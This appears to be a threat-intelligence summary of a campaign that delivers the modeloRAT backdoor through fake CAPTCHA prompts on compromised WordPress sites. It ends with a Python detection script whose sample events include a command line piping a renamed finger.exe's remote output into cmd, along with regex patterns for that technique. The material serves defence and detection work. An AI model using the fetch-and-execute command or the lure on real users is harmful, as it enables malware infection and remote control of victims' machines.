VYPR research · Published Mar 10, 2026 · Updated May 20, 2026 · 1 source

KongTuke Continues ClickFix Campaign via Compromised WordPress Sites to Deliver modeloRAT

Trend Micro MDR analysis reveals KongTuke still uses compromised WordPress sites and fake CAPTCHA lures to deliver modeloRAT, leveraging legitimate Windows tools for stealth.

Trend Micro's Managed Detection and Response (MDR) team has uncovered ongoing attacks by the threat group KongTuke, which continues to compromise legitimate WordPress websites and use fake CAPTCHA prompts to deliver the Python-based modeloRAT malware. The attackers inject malicious JavaScript into trusted sites, tricking users into running a PowerShell command that initiates a multi-stage infection chain. This technique, known as ClickFix, remains active alongside the group's newer CrashFix method, which uses a fake browser extension instead.

The infection chain begins when a user visits a compromised WordPress site. The injected JavaScript sets a cookie, queries Cloudflare for trace information, and sends the user's browser and OS details to a remote server. The server then returns arbitrary content via document.write(), which in this case displays a fake CAPTCHA page instructing the user to copy and run a PowerShell command. Trend Micro's forensic analysis of a victim's browser history showed a search for "florida 2025 IDTF facility" leading to a legitimate WordPress site that had been injected with malicious scripts from domains like ainttby[.]com and ctpsih[.]com.

Once the user executes the PowerShell command, it copies the legitimate Windows tool finger.exe to a temporary file (ct.exe) and runs it. The renamed binary connects to an external IP address (45.61.138[.]224) and pipes the response directly into the command interpreter, so whatever text the server returns is executed as commands. This abuse of built-in system tools, together with the use of trusted services such as Dropbox for file hosting, helps the malware evade detection while maintaining persistence on compromised systems.

modeloRAT is a Python-based backdoor that performs reconnaissance and command execution and maintains persistent access. Before proceeding, the malware checks whether the infected system is joined to a corporate domain and identifies installed security tools, indicating a focus on enterprise environments rather than opportunistic infections. Trend Micro's analysis confirms that the PowerShell command observed in this case exactly matches a January 2026 finding describing the same infection chain.

Recent VirusTotal submissions show numerous WordPress sites injected with similar scripts, demonstrating that this delivery vector remains active and scalable. While the domains used in this specific attack are now inactive, visiting the compromised website revealed another injected script hosted at foodgefy[.]com. The infrastructure characteristics, including naming conventions and ASN overlaps, align with previously documented KongTuke activity from April 2025.

Organizations whose users browse compromised websites or encounter prompts asking them to run commands could be at risk. Trend Micro recommends that enterprises implement web filtering, user awareness training, and endpoint detection rules to block the execution of suspicious PowerShell commands. The continued evolution of KongTuke's tactics, from ClickFix to CrashFix, highlights the need for layered defenses against social engineering attacks that abuse legitimate system tools.
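The finger.exe stage described above gives endpoint teams a concrete rule to write. The following is an added example, not code from the Trend Micro report: it runs three checks over constructed Sysmon-style process-creation events (a renamed copy of finger.exe, finger output piped into a shell, and finger.exe being copied out of System32). Field names, paths and the 203.0.113.10 address are assumptions for the sample data, not values from the report.

```python
"""Flag the renamed-finger.exe pattern in process-creation telemetry.
Constructed example events; field names follow Sysmon Event ID 1."""
import ntpath
import re

# Constructed sample events (not real telemetry). Event 0 stages the copy,
# event 1 is the renamed binary feeding a shell, event 2 is a benign finger run.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\cmd.exe", "OriginalFileName": "Cmd.Exe",
     "CommandLine": r"cmd /c copy C:\Windows\System32\finger.exe C:\Users\u\AppData\Local\Temp\ct.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {"Image": r"C:\Users\u\AppData\Local\Temp\ct.exe", "OriginalFileName": "finger.exe",
     "CommandLine": "ct.exe user@203.0.113.10 | cmd",  # placeholder address (RFC 5737)
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\finger.exe", "OriginalFileName": "finger.exe",
     "CommandLine": "finger admin@fileserver",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
]

# Output of the process piped into a command interpreter.
PIPE_TO_SHELL = re.compile(r"\|\s*(cmd|powershell|pwsh)(\.exe)?\b", re.I)
# A copy command whose source is finger.exe.
COPY_FINGER = re.compile(r"\bcopy\b.*finger\.exe", re.I)


def classify(event):
    """Return the list of reasons an event is suspicious; empty means benign."""
    reasons = []
    image = ntpath.basename(event.get("Image", "")).lower()
    orig = event.get("OriginalFileName", "").lower()
    cmd = event.get("CommandLine", "")
    # 1. PE version info says finger.exe but the file runs under another name.
    if orig == "finger.exe" and image != "finger.exe":
        reasons.append("finger.exe executing under renamed image %s" % image)
    # 2. Whatever the remote host returns is executed as commands.
    if orig == "finger.exe" and PIPE_TO_SHELL.search(cmd):
        reasons.append("finger output piped into command interpreter")
    # 3. Staging: finger.exe copied to a location outside System32.
    if COPY_FINGER.search(cmd):
        dest = cmd.split()[-1].lower()
        if r"\windows\system32" not in dest:
            reasons.append("finger.exe copied to %s" % dest)
    return reasons


def detect(events):
    """Return (Image, reasons) for every event that triggers at least one check."""
    hits = []
    for event in events:
        reasons = classify(event)
        if reasons:
            hits.append((event["Image"], reasons))
    return hits
```

Any hit on checks 1 or 2 is worth an alert on its own; check 3 is best paired with the PowerShell parent shown in the sample, since interactive admins rarely copy finger.exe.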

Synthesized by Vypr AI